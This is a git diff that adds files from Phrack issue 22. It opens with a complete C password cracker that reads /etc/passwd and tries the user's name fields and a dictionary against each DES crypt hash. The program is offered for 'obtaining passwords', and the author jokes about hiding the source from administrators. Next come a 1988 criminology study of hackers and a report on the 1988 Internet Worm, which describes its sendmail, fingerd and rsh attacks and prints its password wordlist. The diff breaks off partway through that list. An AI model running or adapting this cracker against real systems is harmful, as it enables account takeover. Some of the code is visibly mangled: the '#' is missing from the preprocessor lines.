+been around for a long time, and can you say "Code Buster"?  Obsolete now,
+nonetheless taught many how to write better ones.
+
+The following C code will enable you to ferret out poorly constructed passwords
+from /etc/passwd.  What I mean by poor passwords is obvious, these consist of
+passwords based on the user's name, and even words found in the dictionary.
+The most secure password is one that has been constructed from nonsense words,
+odd combinations of one word, with control characters and numbers thrown in.
+My program is not able to deal with a decent password, nor did I intend it to.
+To write something capable of dealing with a secure password would have been
+incredibly complex, and take weeks to run on even the fastest of cpu's.
+
+Locate a dictionary file from your nearest Unix system.  This is commonly
+located in /usr/dict/words.  These files will vary from 200K to 5 Megabytes.
+The more words your dictionary file has in it, the more effective this program
+will be.  The program can do a quick scan based on just the identifying name
+fields in /etc/passwd or perform a complete scan using the dictionary file.  It
+basically compares one /etc/passwd entry to each word in your dictionary file,
+until it finds the password, or reaches eof,and begins the scan on the next
+password.
+
+It will take days to process a large /etc/passwd file.  When you re-direct the
+output to a log file, make sure you run some sort of cron daemon that will
+extract any decoded passwords, and then nulls the log file.  I can suggest
+/bin/nohup for this task since you can log off and the task continues to run.
+Otherwise, the log file can grow to be megabytes depending on the actual size
+of the /etc/passwd file and your dictionary..This program,while written with
+one purpose in mind (obtaining passwords),is also a positive contribution to
+Unix System Administrators.
+
+I run this on several systems nightly, to protect myself!  Scanning for user
+passwords that are easy to hack, and for other insecure conditions ensures that
+my own systems will not be breached.  Unix is still not a secure system, and
+restoring gigabyte file systems is no fun.
+
+I have made the software as portable as possible.  It is known to compile on
+all BSD variants, and System V.  I don't suggest that you leave the source
+laying around on just any system, most System Administrators are known to be
+particularly nosy <smile>.  If you do, for God's sake crypt the damned file.
+
+These are hard times we have fallen into.  The thrill of the telephone network
+is no more.  Mere experimentation is riskier than ever.  There is little left,
+but intellectual challenges in mastering system software and writing
+interesting software for most of us.  As we all get older, the risks have grown
+less attractive versus the few gains.  Someday when I am able to transfer five
+or six million into my account in Zurich, I may chance it.  Until then, may I
+take the time to wish you all good luck in your endeavors, and be careful!
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+/* Beginning of Program */
+
+include <sys/stdio.h>
+include <sys/ctype.h>
+include <sys/signal.h>
+
+define TRUE 1
+define FALSE 0
+
+int trace = FALSE;
+char *dict = NULL;
+char *word = NULL;
+char *pwdfile = NULL;
+char *startid = NULL;
+FILE *pwdf;
+FILE *dictf;
+FILE *logf;
+char nextword[64];
+char preread = FALSE;
+char pbuf[256];
+char id[64];
+char pw[64];
+char goodpw[64];
+
+main(argc,argv)
+int argc;
+char **argv;
+{
+char *passwd;
+char *salt;
+char *s;
+char *crypt();
+char xpw[64];
+char pw2[64];
+char dummy[64];
+char comments[64];
+char shell[64];
+char dictword[64];
+char gotit;
+char important;
+extern int optind;
+extern char *optarg;
+int option;
+int cleanup();
+int tried;
+long time();
+
+signal(SIGTERM,cleanup);
+signal(SIGQUIT,cleanup);
+signal(SIGHUP,cleanup);
+
+while ((option = getopt(argc,argv, "d:i:p:tw:")) != EOF)
+        switch(option) {
+        case 'd':
+                dict = optarg;
+                break;
+
+        case 'i':
+                startid = optarg;
+                break;
+
+        case 'p':
+                pwdfile = optarg;
+                break;
+
+        case 't':
+                ++trace;
+                break;
+
+        case 'w':
+                word = optarg;
+                break;
+
+        default:
+                help();
+        }
+
+if (optind < argc)
+        help();
+
+if (!pwdfile)
+        pwdfile = "/etc/passwd";
+
+openpw();
+if (dict)
+        opendict();
+
+while(TRUE) {
+        if (preread)
+                preread = FALSE;
+        else
+                if (!fgets(pbuf,sizeof(pbuf),pwdf))
+                        break;
+        parse(id,pbuf,':');
+        parse(xpw,pbuf,':');
+        parse(pw,xpw,',');
+        if (*pw && strlen(pw) != 13)
+                continue;
+        parse(dummy,pbuf,':');
+        important = (atoi(dummy) < 5);
+        parse(dummy,pbuf,':');
+        parse(comments,pbuf,':');
+        gotit = !*pw;
+        if (!gotit && *comments) {
+                strcpy(pw2,pw);
+                do {
+                        sparse(pw2,comments);
+                        if (!*pw2) continue;
+                        if (allnum(pw2)) continue;
+                        gotit = works(pw2);
+                        if (!gotit)
+                                if (hasuc(pw2)) {
+                                        lcase(pw2);
+                                        gotit = works(pw2);
+                                }
+                } while (!gotit && *comments);
+                if (!gotit)
+                        gotit = works(id);
+        }
+        if (!gotit && dict) {
+                resetdict();
+                tried = 0;
+                do {
+                        if (works(nextword)) {
+                                gotit = TRUE;
+                                break;
+                        }
+                        if (++tried == 100) {
+                                printf("    <%8s> @
+%ld\n",nextword,time(NULL));
+                                fflush(stdout);
+                                tried = 0;
+                        }
+                } while(readdict());
+        }
+        if (gotit) {
+                if (*pw)
+                        printf("** %8s \t- Password is %s\n",id,goodpw);
+                else {
+                        parse(shell,pbuf,':');
+                        parse(shell,pbuf,':');
+                        shell[strlen(shell)-1] = 0;
+                        printf("   %8s \t- Open Login (Shell=%s)\n",id,shell);
+                }
+                if (important)
+                        printf("--------------------------------------------
+Loo
+k!\n");
+        }
+        else    printf("   %8s \t- Failed\n",id);
+}
+
+cleanup();
+exit(0);
+
+}
+
+
+help()
+{
+fprintf(stderr,"Scan by The Unix Front\n");
+fprintf(stderr,"usage: scan [-ddict] [-iid] [-ppfile] [-t] [-wword]\n");
+exit(1);
+
+}
+
+cleanup()
+{
+
+if (logf)
+        fclose(logf);
+
+}
+
+
+openpw()
+{
+char dummy[256];
+char id[256];
+
+if (!(pwdf = fopen(pwdfile,"r"))) {
+        fprintf("Error opening specified password file: %s\n",pwdfile);
+        exit(2);
+}
+if (startid) {
+        while(TRUE) {
+                if (!(fgets(pbuf,sizeof(pbuf),pwdf))) {
+                        fprintf(stderr,"Can't skip to id '%s'\n",startid);
+                        exit(3);
+                }
+                strcpy(dummy,pbuf);
+                parse(id,dummy,':');
+                if (!strcmp(id,startid)) {
+                        preread = TRUE;
+                        return;
+                }
+        }
+}
+
+}
+
+/* Where's the dictionary file dummy! */
+
+opendict()
+{
+
+if (!(dictf = fopen(dict,"r"))) {
+        fprintf("Error opening specified dictionary: %s\n",dict);
+        exit(4);
+}
+
+}
+
+resetdict()
+{
+char *p;
+
+rewind(dictf);
+
+if (word) {
+        while(TRUE) {
+                if (!(fgets(nextword,sizeof(nextword),dictf))) {
+                        fprintf(stderr,"Can't start with specified word
+'%s'\n",
+word);
+                        exit(3);
+                }
+                if (*nextword) {
+                        p = nextword + strlen(nextword);
+                        *--p = 0;
+                }
+                if (!strcmp(word,nextword))
+                        return;
+        }
+}
+else    if (!(fgets(nextword,sizeof(nextword),dictf)))
+                fprintf(stderr,"Empty word file: %s\n",dict);
+        else    if (*nextword) {
+                        p = nextword + strlen(nextword);
+                        *--p = 0;
+                }
+
+}
+
+
+readdict()
+{
+int sts;
+char *p;
+
+sts = fgets(nextword,sizeof(nextword),dictf);
+if (*nextword) {
+        p = nextword + strlen(nextword);
+        *--p = 0;
+}
+return sts;
+
+}
+
+
+
+works(pwd)
+char *pwd;
+{
+char *s;
+
+if (trace)
+        printf(">> %8s \t- trying %s\n",id,pwd);
+s = crypt(pwd,pw);
+if (strcmp(s,pw))
+        return FALSE;
+
+strcpy(goodpw,pwd);
+
+return TRUE;
+
+}
+
+
+
+parse(s1,s2,t1)
+register char *s1;
+register char *s2;
+char t1;
+{
+char *t2;
+
+t2 = s2;
+while (*s2) {
+        if (*s2 == t1) {
+                s2++;
+                break;
+        }
+        *s1++ = *s2++;
+}
+*s1 = 0;
+while (*t2++ = *s2++);
+
+}
+
+sparse(s1,s2)
+register char *s1;
+register char *s2;
+{
+char *t2;
+
+t2 = s2;
+while (*s2) {
+        if (index(" ()[]-/.",*s2)) {
+                s2++;
+                break;
+        }
+        *s1++ = *s2++;
+}
+*s1 = 0;
+while (*t2++ = *s2++);
+
+}
+
+hasuc(s)
+register char *s;
+{
+
+while (*s)
+        if (isupper(*s++)) return TRUE;
+
+return FALSE;
+
+}
+
+allnum(s)
+register char *s;
+{
+
+while(*s)
+        if (!isdigit(*s++)) return FALSE;
+
+return TRUE;
+
+}
+
+lcase(s)
+register char *s;
+{
+
+while(*s) {
+        if (isupper(*s))
+                *s = tolower(*s);
+        ++s;
+}
+
+}
+
+ifdef HACKED
+
+define void int
+
+static char IP[] = {
+        58,50,42,34,26,18,10, 2,
+        60,52,44,36,28,20,12, 4,
+        62,54,46,38,30,22,14, 6,
+        64,56,48,40,32,24,16, 8,
+        57,49,41,33,25,17, 9, 1,
+        59,51,43,35,27,19,11, 3,
+        61,53,45,37,29,21,13, 5,
+        63,55,47,39,31,23,15, 7,
+};
+
+static char FP[] = {
+        40, 8,48,16,56,24,64,32,
+        39, 7,47,15,55,23,63,31,
+        38, 6,46,14,54,22,62,30,
+        37, 5,45,13,53,21,61,29,
+        36, 4,44,12,52,20,60,28,
+        35, 3,43,11,51,19,59,27,
+        34, 2,42,10,50,18,58,26,
+        33, 1,41, 9,49,17,57,25,
+};
+
+static char PC1_C[] = {
+        57,49,41,33,25,17, 9,
+         1,58,50,42,34,26,18,
+        10, 2,59,51,43,35,27,
+        19,11, 3,60,52,44,36,
+};
+
+static char PC1_D[] = {
+        63,55,47,39,31,23,15,
+         7,62,54,46,38,30,22,
+        14, 6,61,53,45,37,29,
+        21,13, 5,28,20,12, 4,
+};
+
+static char shifts[] = { 1,1,2,2,2,2,2,2,1,2,2,2,2,2,2,1, };
+
+static char PC2_C[] = {
+        14,17,11,24, 1, 5,
+         3,28,15, 6,21,10,
+        23,19,12, 4,26, 8,
+        16, 7,27,20,13, 2,
+};
+
+static char PC2_D[] = {
+        41,52,31,37,47,55,
+        30,40,51,45,33,48,
+        44,49,39,56,34,53,
+        46,42,50,36,29,32,
+};
+
+static char C[28];
+static char D[28];
+static char KS[16][48];
+static char E[48];
+static char e2[] = {
+        32, 1, 2, 3, 4, 5,
+         4, 5, 6, 7, 8, 9,
+         8, 9,10,11,12,13,
+        12,13,14,15,16,17,
+        16,17,18,19,20,21,
+        20,21,22,23,24,25,
+        24,25,26,27,28,29,
+        28,29,30,31,32, 1,
+};
+
+void
+setkey(key)
+char    *key;
+{
+        register int i, j, k;
+        int     t;
+
+        for(i=0; i < 28; i++) {
+                C[i] = key[PC1_C[i]-1];
+                D[i] = key[PC1_D[i]-1];
+        }
+
+        for(i=0; i < 16; i++) {
+
+
+                for(k=0; k < shifts[i]; k++) {
+                        t = C[0];
+                        for(j=0; j < 28-1; j++)
+                                C[j] = C[j+1];
+                        C[27] = t;
+                        t = D[0];
+                        for(j=0; j < 28-1; j++)
+                                D[j] = D[j+1];
+                        D[27] = t;
+                }
+
+
+                for(j=0; j < 24; j++) {
+                        KS[i][j] = C[PC2_C[j]-1];
+                        KS[i][j+24] = D[PC2_D[j]-28-1];
+                }
+        }
+
+        for(i=0; i < 48; i++)
+                E[i] = e2[i];
+}
+
+static char S[8][64] = {
+        14, 4,13, 1, 2,15,11, 8, 3,10, 6,12, 5, 9, 0, 7,
+         0,15, 7, 4,14, 2,13, 1,10, 6,12,11, 9, 5, 3, 8,
+         4, 1,14, 8,13, 6, 2,11,15,12, 9, 7, 3,10, 5, 0,
+        15,12, 8, 2, 4, 9, 1, 7, 5,11, 3,14,10, 0, 6,13,
+
+        15, 1, 8,14, 6,11, 3, 4, 9, 7, 2,13,12, 0, 5,10,
+         3,13, 4, 7,15, 2, 8,14,12, 0, 1,10, 6, 9,11, 5,
+         0,14, 7,11,10, 4,13, 1, 5, 8,12, 6, 9, 3, 2,15,
+        13, 8,10, 1, 3,15, 4, 2,11, 6, 7,12, 0, 5,14, 9,
+
+        10, 0, 9,14, 6, 3,15, 5, 1,13,12, 7,11, 4, 2, 8,
+        13, 7, 0, 9, 3, 4, 6,10, 2, 8, 5,14,12,11,15, 1,
+        13, 6, 4, 9, 8,15, 3, 0,11, 1, 2,12, 5,10,14, 7,
+         1,10,13, 0, 6, 9, 8, 7, 4,15,14, 3,11, 5, 2,12,
+
+         7,13,14, 3, 0, 6, 9,10, 1, 2, 8, 5,11,12, 4,15,
+        13, 8,11, 5, 6,15, 0, 3, 4, 7, 2,12, 1,10,14, 9,
+        10, 6, 9, 0,12,11, 7,13,15, 1, 3,14, 5, 2, 8, 4,
+         3,15, 0, 6,10, 1,13, 8, 9, 4, 5,11,12, 7, 2,14,
+
+         2,12, 4, 1, 7,10,11, 6, 8, 5, 3,15,13, 0,14, 9,
+        14,11, 2,12, 4, 7,13, 1, 5, 0,15,10, 3, 9, 8, 6,
+         4, 2, 1,11,10,13, 7, 8,15, 9,12, 5, 6, 3, 0,14,
+        11, 8,12, 7, 1,14, 2,13, 6,15, 0, 9,10, 4, 5, 3,
+
+        12, 1,10,15, 9, 2, 6, 8, 0,13, 3, 4,14, 7, 5,11,
+        10,15, 4, 2, 7,12, 9, 5, 6, 1,13,14, 0,11, 3, 8,
+         9,14,15, 5, 2, 8,12, 3, 7, 0, 4,10, 1,13,11, 6,
+         4, 3, 2,12, 9, 5,15,10,11,14, 1, 7, 6, 0, 8,13,
+
+         4,11, 2,14,15, 0, 8,13, 3,12, 9, 7, 5,10, 6, 1,
+        13, 0,11, 7, 4, 9, 1,10,14, 3, 5,12, 2,15, 8, 6,
+         1, 4,11,13,12, 3, 7,14,10,15, 6, 8, 0, 5, 9, 2,
+         6,11,13, 8, 1, 4,10, 7, 9, 5, 0,15,14, 2, 3,12,
+
+        13, 2, 8, 4, 6,15,11, 1,10, 9, 3,14, 5, 0,12, 7,
+         1,15,13, 8,10, 3, 7, 4,12, 5, 6,11, 0,14, 9, 2,
+         7,11, 4, 1, 9,12,14, 2, 0, 6,10,13,15, 3, 5, 8,
+         2, 1,14, 7, 4,10, 8,13,15,12, 9, 0, 3, 5, 6,11,
+};
+
+static char P[] = {
+        16, 7,20,21,
+        29,12,28,17,
+         1,15,23,26,
+         5,18,31,10,
+         2, 8,24,14,
+        32,27, 3, 9,
+        19,13,30, 6,
+        22,11, 4,25,
+};
+
+
+static char L[32], R[32];
+static char tempL[32];
+static char f[32];
+static char preS[48];
+
+void
+encrypt(block, edflag)
+char    *block;
+int     edflag;
+{
+        int     i, ii;
+        register int t, j, k;
+
+        for(j=0; j < 64; j++)
+                L[j] = block[IP[j]-1];
+
+        for(ii=0; ii < 16; ii++) {
+
+                if(edflag)
+                        i = 15-ii;
+                else
+                        i = ii;
+
+                for(j=0; j < 32; j++)
+                        tempL[j] = R[j];
+
+                for(j=0; j < 48; j++)
+                        preS[j] = R[E[j]-1] ^ KS[i][j];
+
+                for(j=0; j < 8; j++) {
+                        t = 6*j;
+                        k = S[j][(preS[t+0]<<5)+
+                                (preS[t+1]<<3)+
+                                (preS[t+2]<<2)+
+                                (preS[t+3]<<1)+
+                                (preS[t+4]<<0)+
+                                (preS[t+5]<<4)];
+                        t = 4*j;
+                        f[t+0] = (k>>3)&01;
+                        f[t+1] = (k>>2)&01;
+                        f[t+2] = (k>>1)&01;
+                        f[t+3] = (k>>0)&01;
+                }
+
+                for(j=0; j < 32; j++)
+                        R[j] = L[j] ^ f[P[j]-1];
+
+                for(j=0; j < 32; j++)
+                        L[j] = tempL[j];
+        }
+
+        for(j=0; j < 32; j++) {
+                t = L[j];
+                L[j] = R[j];
+                R[j] = t;
+        }
+
+        for(j=0; j < 64; j++)
+                block[j] = L[FP[j]-1];
+}
+
+char *
+crypt(pw, salt)
+char    *pw, *salt;
+{
+        register int i, j, c;
+        int     temp;
+        static char block[66], iobuf[16];
+
+        for(i=0; i < 66; i++)
+                block[i] = 0;
+        for(i=0; (c= *pw) && i < 64; pw++) {
+                for(j=0; j < 7; j++, i++)
+                        block[i] = (c>>(6-j)) & 01;
+                i++;
+        }
+
+        setkey(block);
+
+        for(i=0; i < 66; i++)
+                block[i] = 0;
+
+        for(i=0; i < 2; i++) {
+                c = *salt++;
+                iobuf[i] = c;
+                if(c > 'Z')
+                        c -= 6;
+                if(c > '9')
+                        c -= 7;
+                c -= '.';
+                for(j=0; j < 6; j++) {
+                        if((c>>j) & 01) {
+                                temp = E[6*i+j];
+                                E[6*i+j] = E[6*i+j+24];
+                                E[6*i+j+24] = temp;
+                        }
+                }
+        }
+
+        for(i=0; i < 25; i++)
+                encrypt(block, 0);
+
+        for(i=0; i < 11; i++) {
+                c = 0;
+                for(j=0; j < 6; j++) {
+                        c <<= 1;
+                        c |= block[6*i+j];
+                }
+                c += '.';
+                if(c > '9')
+                        c += 7;
+                if(c > 'Z')
+                        c += 6;
+                iobuf[i+2] = c;
+        }
+        iobuf[i+2] = 0;
+        if(iobuf[1] == 0)
+                iobuf[1] = iobuf[0];
+        return(iobuf);
+}
+
+endif
+
+/* end of program */
+_______________________________________________________________________________
diff --git a/phrack22/7.txt b/phrack22/7.txt
new file mode 100644
index 0000000..aa8a57a
--- /dev/null
+++ b/phrack22/7.txt
@@ -0,0 +1,167 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 22, File 7 of 12
+
+           [][][][][][][][][][][][][][][][][][][][][][][][][][][][]
+           []                                                    []
+           [] Computer Hackers Follow A Guttman-Like Progression []
+           []                                                    []
+           []               by Richard C. Hollinger              []
+           []                University Of Florida               []
+           []                                                    []
+           []                     April, 1988                    []
+           []                                                    []
+           [][][][][][][][][][][][][][][][][][][][][][][][][][][][]
+
+Little is known about computer "hackers," those who invade the privacy of
+somone else's computer.  This pretest gives us reason to believe that their
+illegal activities follow a Guttman-like involvement in deviance.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Computer crime has gained increasing attention, from news media to the
+legislature.  The nation's first computer crime statute passed unanimously in
+the Florida Legislature during 1978 in response to a widely publicized incident
+at the Flagler Dog Track near Miami where employees used a computer to print
+bogus winning trifecta tickets (Miami Herald, 1977a and 1977b; Underwood,
+1979).  Forty-seven states and the federal government have enacted some
+criminal statue prohibiting unauthorized computer access, both malicious and
+non-malicious (BloomBecker, 1986; Scott, 1984; U.S. Public Law 98-4733, 1984;
+U.S. Public Law 99-474, 1986).  Although some computer deviance might already
+have been illegal under fraud or other statutes, such rapid criminalization of
+this form of deviant behavior is itself an interesting social phenomenon.
+
+Parker documented thousands of computer-related incidents (1976; 1979; 1980a;
+1980b; and 1983), arguing that most documented cases of computer abuse were
+discovered by accident.  He believed that these incidents represent the tip of
+the iceberg.  Others counter that many of these so-called computer crimes are
+apocryphal or not uniquely perpetrated by computer (Taber, 1980; Time, 1986).
+
+Parker's work (1976; 1983) suggests that computer offenders are typically males
+in the mid-twenties and thirties, acting illegally in their jobs, but others
+may be high school and college students (New York Times, 1984b; see related
+points in Hafner, 1983; Shea, 1984; New York Times, 1984a).
+
+Levy (1984) and Landreth (1985) both note that some computer aficionados have
+developed a "hacker ethic" allowing harmless computer exploration, including
+free access to files belonging to other users, bypassing passwords and security
+systems, outwitting bureaucrats preventing access, and opposing private
+software and copy protection schemes.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+This research on computer hackers is based on a small number of semi-structured
+two-hour interviews covering many topics, including ties to other users,
+computer ethics, knowledge of computer crime statutes, and self-reports of
+using computers in an illegal fashion.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Such acts include these ten:
+1.  Acquiring another user's password.
+2.  Unauthorized use of someone else's computer account.
+3.  Unauthorized "browsing" among other user's computer files.
+4.  Unauthorized "copying" of another user's computer files.
+5.  Unauthorized file modification.
+6.  Deliberate sabotage of another user's programs.
+7.  Deliberately "crashing" a computer system.
+8.  Deliberate damage or theft of computer hardware.
+9.  Making an unauthorized or "pirated" copy of proprietary computer software
+    for another user.
+10. Receiving an unauthorized or "pirated" copy of proprietary computer
+    software from another user.
+
+In 1985, a group of five students took unauthorized control of the account
+management system on one of the University of Florida's Digital VAX computers.
+They were able to allocate new accounts to each other and their friends.  In
+addition, they browsed through other users' accounts, files and programs, and
+most importantly, they modified or damaged a couple of files and programs on
+the system.  All first-time offenders, three of the five performed "community
+service" in consenting to being interviewed for this paper.  Eight additional
+interviews were conducted with students selected randomly from an computer
+science "assembler" (advanced machine language) class.  These students are
+required to have a working knowledge of both mainframe systems and micro
+computers, in addition to literacy in at least two other computer languages.
+
+The State Attorney's decision not to prosecute these non-malicious offenders
+under Florida's Computer Crime Act (Chapter 815) may reflect a more general
+trend.  From research on the use (actually non-use) of computer crime statutes
+nationally, both BloomBecker (1986) and Pfuhl (1987) report that given the lack
+of a previous criminal record and the generally "prankish" nature of the vast
+majority of these "crimes," very few offenders are being prosecuted with these
+new laws.
+
+The three known offenders differed little from four of the eight computer
+science students in their level of self-reported computer deviance.  The
+interviews suggest that computer deviance follows a Guttman-like progression of
+involvement.  Four of the eight computer science respondents (including all
+three females) reported no significant deviant activity using the computer.
+They indicated no unauthorized browsing or file modification and only isolated
+trading of "pirated" proprietary software.  When asked, none of these
+respondents considered themselves "hackers."  However, two of the eight
+computer science students admitted to being very active in unauthorized use.
+
+Respondents who admitted to violations seem to fit into three categories.
+PIRATES reported mainly copyright infringements, such as giving or receiving
+illegally copied versions of popular software programs.  In fact, pirating
+software was the most common form of computer deviance discovered, with
+slightly over half of the respondents indicating some level of involvement.  In
+addition to software piracy, BROWSERS gained occasional unauthorized access to
+another user's university computer account and browsed the private files of
+others.  However, they did not damage or copy these files.  CRACKERS were most
+serious abusers.  These five individuals admitted many separate instances of
+the other two types of computer deviance, but went beyond that.  They reported
+copying, modifying, and sabotaging other user's computer files and programs.
+These respondents also reported "crashing" entire computer systems or trying to
+do so.
+
+Whether for normative or technical reaspons, at least in this small sample,
+involvement in computer crime seems to follow a Guttman-like progression.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+                                  REFERENCES
+
+BloomBecker, Jay.  1986.  Computer Crime Law Reporter:  1986 Update.  Los
+     Angeles:  National Center for Computer Crime Data.
+Florida, State of.  1978.  Florida Computer Crimes Act Chapter 815.01-815.08.
+Hafner, Katherine.  1983.  "UCLA student penetrates DOD Network," InfoWorld
+     5(47):  28.
+Landreth, Bill. 1985.  Out of the Inner Circle:  A Hacker's Guide to Computer
+     Security.  Bellevue, Washington:  Microsoft Press.
+Levy, Steven.  1984.  Hackers:  Heroes of the Computer Revolution.  New York:
+     Doubleday.
+Miami Herald.  1977a-.  "Dog players bilked via computer,"  (September
+     20):1,16.
+--1977b "Why Flagler Dog Track was easy pickings," (September 21):  1,17.
+Newsweek.  1983a.  "Beware:  Hackers at play," (September 5):  42-46,48.
+--1983b.  "Preventing 'WarGames'," (September 5):  48.
+New York Times.  1984a.  "Low Tech" (January 5):  26.
+--1984b.  "Two who raided computers pleading guilty," (March 17):  6.
+Parker, Donn B.  1976.  Crime By Computer.  New York:  Charles Scribner's Sons.
+--1979.  Computer Crime:  Criminal Justice Resource Manual.  Washington, D.C.:
+     U.S. Government Printing Office.
+--1980a.  "Computer abuse research update," Computer/Law Journal 2:  329-52.
+--1980b.  "Computer-related white collar crime," In Gilbert Geis and Ezra
+     Stotland (eds.), White Collar Crime:  Theory and Research.  Beverly Hills,
+     CA.:  Sage, pp.  199-220.
+--1983.  Fighting Computer Crime.  New York:  Charles Scribner's Sons.
+Pful, Erdwin H.  1987.  "Computer abuse:  problems of instrumental control.
+     Deviant Behavior 8:  113-130.
+Scott, Michael D.  1984.  Computer Law.  New York:  John Wiley and Sons.
+Shea, Tom.  1984.  "The FBI goes after hackers," Infoworld 6 (13):
+     38,39,41,43,44.
+Taber, John K.  1980.  "A survey of computer crime studies," Computer/Law
+     Journal 2:  275-327.
+Time.  1983a.  "Playing games," (August 22):  14.
+--1983b.  "The 414 gang strikes again," (August 29):  75.
+--1986.  "Surveying the data diddlers," (February 17):  95.
+Underwood, John.  1979.  "Win, place...  and sting," Sports Illustrated 51
+     (July 23):  54-81+.
+U.S. Public Law 98-473.  1984.  Counterfeit Access Device and Computer Fraud
+     and Abuse Act of 1984.  Amendment to Chapter 47 of Title 18 of the United
+     States Code, (October 12).
+U.S. Public Law 99-474.  1986.  Computer Fraud and Abuse Act of 1986.
+     Amendment to Chapter 47 of Title 18 of the United States Code, (October
+     16).
+_______________________________________________________________________________
diff --git a/phrack22/8.txt b/phrack22/8.txt
new file mode 100644
index 0000000..3bc3aa5
--- /dev/null
+++ b/phrack22/8.txt
@@ -0,0 +1,291 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 22, File 8 of 12
+
+            "]}`"`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\
+            \`\`\                                             \`\`\
+            \`\          A Report On The InterNet Worm          \`\
+            \`\                                                 \`\
+            \`\                   By Bob Page                   \`\
+            \`\                                                 \`\
+            \`\              University of Lowell               \`\
+            \`\           Computer Science Department           \`\
+            \`\                                                 \`\
+            \`\                November 7, 1988                 \`\
+            \`\`\                                             \`\`\
+            \`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\
+
+
+Here's the truth about the "Internet Worm."  Actually it's not a virus -
+a virus is a piece of code that adds itself to other programs, including
+operating systems.  It cannot run independently, but rather requires that its
+"host" program be run to activate it.  As such, it has a clear analog to
+biologic viruses -- those viruses are not considered live, but they invade host
+cells and take them over, making them produce new viruses.
+
+A worm is a program that can run by itself and can propagate a fully working
+version of itself to other machines.  As such, what was loosed on the Internet
+was clearly a worm.
+
+This data was collected through an emergency mailing list set up by Gene
+Spafford at Purdue University, for administrators of major Internet sites -
+some of the text is included verbatim from that list.
+
+The basic object of the worm is to get a shell on another machine so it can
+reproduce further.  There are three ways it attacks: sendmail, fingerd, and
+rsh/rexec.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+The Sendmail Attack:
+
+In the sendmail attack, the worm opens a TCP connection to another machine's
+sendmail (the SMTP port), invokes debug mode, and sends a RCPT TO that requests
+its data be piped through a shell.  That data, a shell script (first-stage
+bootstrap) creates a temporary second-stage bootstrap file called x$$,l1.c
+(where '$$' is the current process ID).  This is a small (40-line) C program.
+
+The first-stage bootstrap compiles this program with the local cc and executes
+it with arguments giving the Internet hostid/socket/password of where it just
+came from.  The second-stage bootstrap (the compiled C program) sucks over two
+object files, x$$,vax.o and x$$,sun3.o from the attacking host.  It has an
+array for 20 file names (presumably for 20 different machines), but only two
+(vax and sun) were compiled in to this code.  It then figures out whether it's
+running under BSD or SunOS and links the appropriate file against the C library
+to produce an executable program called /usr/tmp/sh - so it looks like the
+Bourne shell to anyone who looked there.
+
+
+The Fingerd Attack:
+
+In the fingerd attack, it tries to infiltrate systems via a bug in fingerd, the
+finger daemon.  Apparently this is where most of its success was (not in
+sendmail, as was originally reported).  When fingerd is connected to, it reads
+its arguments from a pipe, but doesn't limit how much it reads.  If it reads
+more than the internal 512-byte buffer allowed, it writes past the end of its
+stack.  After the stack is a command to be executed ("/usr/ucb/finger") that
+actually does the work.  On a VAX, the worm knew how much further from the
+stack it had to clobber to get to this command, which it replaced with the
+command "/bin/sh" (the bourne shell).  So instead of the finger command being
+executed, a shell was started with no arguments.  Since this is run in the
+context of the finger daemon, stdin and stdout are connected to the network
+socket, and all the files were sucked over just like the shell that sendmail
+provided.
+
+
+The Rsh/Rexec Attack:
+
+The third way it tried to get into systems was via the .rhosts and
+/etc/hosts.equiv files to determine 'trusted' hosts where it might be able to
+migrate to.  To use the .rhosts feature, it needed to actually get into
+people's accounts - since the worm was not running as root (it was running as
+daemon) it had to figure out people's passwords.  To do this, it went through
+the /etc/passwd file, trying to guess passwords.  It tried combinations of: the
+username, the last, first, last+first, nick names (from the GECOS field), and a
+list of special "popular" passwords:
+
+aaa             cornelius    guntis      noxious       simon
+academia        couscous     hacker      nutrition     simple
+aerobics        creation     hamlet      nyquist       singer
+airplane        creosote     handily     oceanography  single
+albany          cretin       happening   ocelot        smile
+albatross       daemon       harmony     olivetti      smiles
+albert          dancer       harold      olivia        smooch
+alex            daniel       harvey      oracle        smother
+alexander       danny        hebrides    orca          snatch
+algebra         dave         heinlein    orwell        snoopy
+aliases         december     hello       osiris        soap
+alphabet        defoe        help        outlaw        socrates
+ama             deluge       herbert     oxford        sossina
+amorphous       desperate    hiawatha    pacific       sparrows
+analog          develop      hibernia    painless      spit
+anchor          dieter       honey       pakistan      spring
+andromache      digital      horse       pam           springer
+animals         discovery    horus       papers        squires
+answer          disney       hutchins    password      strangle
+anthropogenic   dog          imbroglio   patricia      stratford
+anvils          drought      imperial    penguin       stuttgart
+anything        duncan       include     peoria        subway
+aria            eager        ingres      percolate     success
+ariadne         easier       inna        persimmon     summer
+arrow           edges        innocuous   persona       super
+arthur          edinburgh    irishman    pete          superstage
+athena          edwin        isis        peter         support
+atmosphere      edwina       japan       philip        supported
+aztecs          egghead      jessica     phoenix       surfer
+azure           eiderdown    jester      pierre        suzanne
+bacchus         eileen       jixian      pizza         swearer
+bailey          einstein     johnny      plover        symmetry
+banana          elephant     joseph      plymouth      tangerine
+bananas         elizabeth    joshua      polynomial    tape
+bandit          ellen        judith      pondering     target
+banks           emerald      juggle      pork          tarragon
+barber          engine       julia       poster        taylor
+baritone        engineer     kathleen    praise        telephone
+bass            enterprise   kermit      precious      temptation
+bassoon         enzyme       kernel      prelude       thailand
+batman          ersatz       kirkland    prince        tiger
+beater          establish    knight      princeton     toggle
+beauty          estate       ladle       protect       tomato
+beethoven       euclid       lambda      protozoa      topography
+beloved         evelyn       lamination  pumpkin       tortoise
+benz            extension    larkin      puneet        toyota
+beowulf         fairway      larry       puppet        trails
+berkeley        felicia      lazarus     rabbit        trivial
+berliner        fender       lebesgue    rachmaninoff  trombone
+beryl           fermat       lee         rainbow       tubas
+beverly         fidelity     leland      raindrop      tuttle
+bicameral       finite       leroy       raleigh       umesh
+bob             fishers      lewis       random        unhappy
